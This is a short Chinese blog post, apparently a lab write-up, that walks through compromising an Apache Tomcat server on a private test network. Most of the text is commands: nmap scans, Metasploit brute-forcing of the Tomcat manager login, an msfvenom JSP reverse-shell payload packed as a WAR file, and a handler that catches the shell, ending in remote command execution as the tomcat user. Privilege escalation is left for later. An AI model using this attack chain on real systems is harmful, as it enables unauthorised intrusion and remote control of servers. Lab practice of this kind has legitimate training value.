Nmap -sS -Pn 192.168.232.0/24

nmap -v -A -sS -Pn -T4 -p 1-65535 192.168.232.132

扫页面

数据库部署成功后打开msf，利用这个模块：use auxiliary/scanner/http/tomcat_mgr_login

Show Options查看需要部署的选项

RHOSTS：目标机ip

THREAD：线程，设为5即可

BRUTEFORCE_SPEED：攻击速度

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.232.130 LPORT=10086  > shell.jsp

jar -cvf shell.war shell.jsp

在Tomcat里面上传此Shell

用MSF来监听

console

use exploit/multi/handler

set payload java/jsp_shell_reverse_tcp

set LHOST 192.168.232.130

set LPORT 10086

exploit

完成远程命令执行 权限为tomcat

接下来为提权(做完继续更= - =  目前刚做到这)

最新文章

1. 如何一步一步用DDD设计一个电商网站（二）—— 项目架构
2. 强大css3制作新浪LOGO 胜过PS
3. mysql 检查字符串是否包含子串
4. LDS，LES，LFS，LGS，LSS指令
5. HTML5每日一练之details展开收缩标签的应用
6. Appium自动化测试环境的搭建及脚本执行
7. SGU 181.X-Sequence
8. 2.2.2 从 Path 中获取信息
9. Unity3D NGUI UIPlayTween控件（一）动态打开关闭窗口
10. stl_map,set 用法
11. Java - Instrumentation
12. Windows下杀掉全部的子线程
13. 微信小程序之弹出操作菜单
14. 辨析element.offsetXxxx和element.style.xxxx
15. vue环境下安装npm,启动npm 修改js,css样式
16. Java10-java语法基础（九）——java的封装性
17. 阿里云存储oss+怎么上传找文件夹
18. 05-老马jQuery教程-动画
19. springMVC集成CXF快速发布webService
20. 什么是Gradle

热门文章

1. Spring cloud系列教程第十篇- Spring cloud整合Eureka总结篇
2. bzoj3289Mato的文件管理
3. J.U.C体系进阶（二）：juc-locks 锁框架
4. 【软件安装】在 CentOS 7(Linux)上部署流媒体服务(Tengine、ffmpeg、Centos 7、nginx-http-flv-module、OBS)
5. 仔细想想SpringAOP也不难嘛，面试没有必要慌
6. 使用SQL语句进行特定值排序
7. 设计模式：memento模式
8. 第 13 篇：DRF 框架之 API 版本管理
9. Nginx（一）Linux上的Nginx安装步骤
10. 面试题二十二：链表中倒数第k个节点